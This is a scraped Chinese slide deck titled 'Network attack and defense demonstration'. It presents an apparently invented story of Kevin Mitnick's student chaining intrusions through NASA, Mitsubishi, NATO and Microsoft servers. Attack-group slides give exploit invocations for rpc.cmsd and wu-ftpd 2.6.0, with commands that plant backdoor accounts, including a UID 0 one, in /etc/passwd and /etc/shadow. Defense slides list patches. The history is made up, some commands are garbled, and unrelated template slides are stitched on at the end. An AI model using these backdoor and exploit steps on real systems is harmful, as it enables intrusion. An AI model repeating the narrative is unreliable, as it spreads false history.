《网络攻防演示.ppt》由会员分享,可在线阅读,更多相关《网络攻防演示.ppt(31页珍藏版)》请在三一文库上搜索。
1、网络攻防演示,前言,“这世界上没有进不去的电脑 ” 世界头号黑客:KEVIN MITNICK,案例分析,在1999年5月,MITNICK入侵NASA,入侵五角大楼,2001年6月,在美国TMD搞得纷纷扬扬之制,MITNICK的得意弟子prime(网名)已经把目标瞄准了美国五角大楼的TMD计划资料,发现了五角大楼中的一台WINDOWS 2000服务器WEB存在printer漏洞, prime使用了他最新发现的漏洞,成功增加了一临时管理员帐号,接着用终端服务成功登录该系统.凭着黑客特有的毅力,在经过三个多星期的观察和窥探后,终于发现了TMD计划资料的确实存放位置,成功取得五角大楼最高机密资料-TM
2、D计划。,入侵过程图解,NASA,攻击者,日本三菱,中国某政府网站,北约网站,微软公司,详解,第一步:,攻击组,可使用letmein.exe等攻击程序获得系统的帐号并进行猜测密码,在WINDOWS下使用以下命令 etmein ip -admin g 并使用猜中的帐号密码为administrator/administrator,使用终端服务连接上该服务器,防守组,可使用letmein.exe等攻击程序获得系统的帐号并进行猜测密码,在WINDOWS下使用以下命令: letmein ip -admin g 并使用猜中的帐号密码为administrator/administrator,使用终端服务连接
3、上该服务器,方法一:,如果不需要共享目录文件服务的,可通过关闭SERVER服务,把该SERVER服务改为手动启动,方法二:,通过选择以下选项来限制只有合法用户才能建立连接本地安全策略-安全设置-本地策略-安全选项-对匿名连接的额外限制-没有显式匿名权限就无法访问。,专家分析,以上问题,主要被攻击原因是公司的安全策略的制定没有做好,网站投入运行前期工作准备不足,系统管理人员安全意识不够,没有对系统的帐号用户所使用的密码进行有效的监控,第二步,在获得了第一台跳板的控制权限后, MITNICK把第二台跳板服务器地址定为日本三菱网站(www.mitsubishi.co.jp),那是一台SOLARIS的
4、服务器,被发现存在RPC.CMSD漏洞。,攻击组,使用RPC.CMSD漏洞程序.远程获得ROOT权限,在SOLARIS下运行CMSD漏洞程序 cmsd h hostname 2 IP telnet IP 1524 连上攻击后开放的端口 连上后运行以下命令来增加两个帐号留代以后作为登录该服务器入口(一个为root权限帐号,一个为普通帐号权限帐号),攻击组,echo “hacker1:x:5000:10:/home:/bin/sh” /etc/passwd echo “hacker1:11401:” /etc/shadow echo “hacker2:x:0:0:/home:/bin/sh” /e
5、tc/passwd echo “hacker2:11402:” /etc/shadow,防守组,其实该问题,在不使用该服务的情况下,可以通过关闭 rpc.cmsd服务来解决。方法是在/etc/inetd.conf中注释掉下列行: 100068/2-5 dgram rpc/udp wait root /usr/dt/bin/rpc.cmsd rpc.cmsd 然后重新启动inetd.如果真的需要使用该服务时, 下载并安装上以下补丁,运行以下命令: Wget ftp:/ unzip 107022-08.zip patchadd ./107022-08,专家组,大家可以看到以上问题,主要是由于Sun
6、 MicroSystem公司在设计rpc.cmsd服务端时的错误,造成一个远程的入侵者可以通过Rpc.cmsd的远程缓冲区溢出漏洞获得系统的管理员权限,而且管理员安全意识不够,没有做好系统的维护工作,也没有为系统打上及时的补丁,所以说一个公司或企业安全策略的制订是非常必要的。,第三步,在获得了两台跳板的访问控制权限后,他又继续将第三台跳板服务器定为北约网站www.nato.int,该服务器是一台Linux的服务器,被发现存在wu-ftpd 2.6.0漏洞,攻击组,使用WUFTP漏洞程序,远程获得ROOT权限,在LINUX下使用WUFTP漏洞攻击程序: ./wu26 -t IP -s 0 连上后
7、运行以下命令来增加两个帐号留代以后作为登录该服务器入口(一个为root权限帐号,一个为普通帐号权限帐号),攻击组,echo “hacker1:x:5000:10:/home:/bin/sh” /etc/passwd echo “hacker1:11401:” /etc/shadow echo “hacker2:x:0:0:/home:/bin/sh” /etc/passwd echo “hacker2:11402:” /etc/shadow,防守组,其实该问题,是可以通过升级该WUFTP服务来防止该问题,只需要下载并升级该RPM安装包,执行命令如下: wget ftp:/ rpm Fvh wu
8、-ftpd-2.6.0-14.6x.i386.rpm,专家组,大家可以看到以上问题,主要由于该组织所使用管理员安全意识不够,虽然使用了FIREWALL等安全产品,但由于配置不当,系统的维护工作没有做好,并没有为系统打上及时的补丁等所做造的,所以说并不是使用了安全产品就可以高枕无忧,也并不是安全的终结,安全也是相对的,并没有绝对的安全,公司还应实施相应安全措施和相应的策略.,专家组,该漏洞其实是Wu-ftpd在SITE EXEC实现上存在严重安全问题,它将用户输入的数据错误的作为格式字符串传送给vsnprintf()函数,攻击者可以构造一个特殊的格式字符串,例如%.f%.f%.f %.d%n来覆
9、盖堆栈中的某些重要数据,返回地址或者保存的uid等等,攻击者可以远程执行系统命令。这种攻击并不等同于通常的缓冲区溢出攻击,主要是错误的使用vsnprintf()以及缺乏对用户输入数据的检查引起的。,专家组,建议下载并升级该RPM安装包,地址如下: i386: ftp:/ alpha: ftp:/ sparc: ftp:/ sources: ftp:/ 2000 Advanced Server的服务器,在通过一般攻击方法的扫描分析后,发现该服务器安全性做的不错,一时无法得手,于是他决定通过微软员工入手,向微软员工发送一个能捕获帐号和密码并发送到指定邮箱的病毒,以使用该方法获得该系统的管理帐号和密
10、码。在经过多个小时的焦急等候后,MITNICK欣喜的发现使用的免费邮箱有信到了,在使用最快的速度,把该密码记下后,他成功的使用该帐号和密码进入了该系统.,攻击组,使用任意程序,发送到我们自己的一个邮箱,然后我们其中一个人把密码发到要攻击的人的信箱中,发的帐号密码为abc/abc,再使用终端服务客户端程序连接上Windows 2000 Advanced Server所默认安装的终端服务,登录进入该系统,防守组,以上问题,还是部分员工的安全警觉性不够,被攻击者所利用,其实是可以使用病毒FIREWALL来检查和过滤病毒邮件来防止的,专家分析,大家可以看到,连世界最大的软件公司都被人利用了公司员工管理
11、上存在的漏洞,主要还是网络管理人员的安全素质没有提高,也没有受到过什么真正的上岗的安全培训,这其实也是公司的管理策略中雇员的权利和职责问题没有做好,除了以上问题外,还有该公司在考虑网络安全方案时,也并没有把防病毒方案考虑进去所造成的,其实在国内也存在非常多的大型公司并没有考虑到该问题,这方面的问题,其实可找相应的安全公司咨询,他们都有相应的防病毒产品和整体解决方案提供给客户,如:创源公司的安全之星产品,该公司还有针对不同客户的相应防病毒整体解决方案,等等,入侵过程详解,NASA,攻击者,日本三菱,中国某政府网站,北约网站,微软公司,利用帐号密码administrator/administrat
12、or,使用telnet命令,利用帐号hacker1 登录网站,再使用su hacker2命令,变成超级用户,SADMIND攻击程序,获取ROOT权限,利用帐号密码abc/abc,使用telnet命令,利用帐号hacker1 登录网站,再使用su hacker2命令,变成超级用户,攻击组,使用任意程序,发送到我们自己的一个邮箱,然后我们其中一个人把密码发到要攻击的人的信箱中,发的帐号密码为abc/abc,再使用终端服务客户端程序连接上Windows 2000 Advanced Server所默认安装的终端服务,登录进入该系统,当前状态,进度与日程的宏观对比 与进度相符的部分 延期的部分 超前的部分 意外的延迟或问题,相关文档,市场计划 存储位置或联系人姓名和电话 预算 存储位置或联系人姓名和电话 总结报告 存储位置或联系人姓名和电话 提出问题 存储位置或联系人姓名和电话,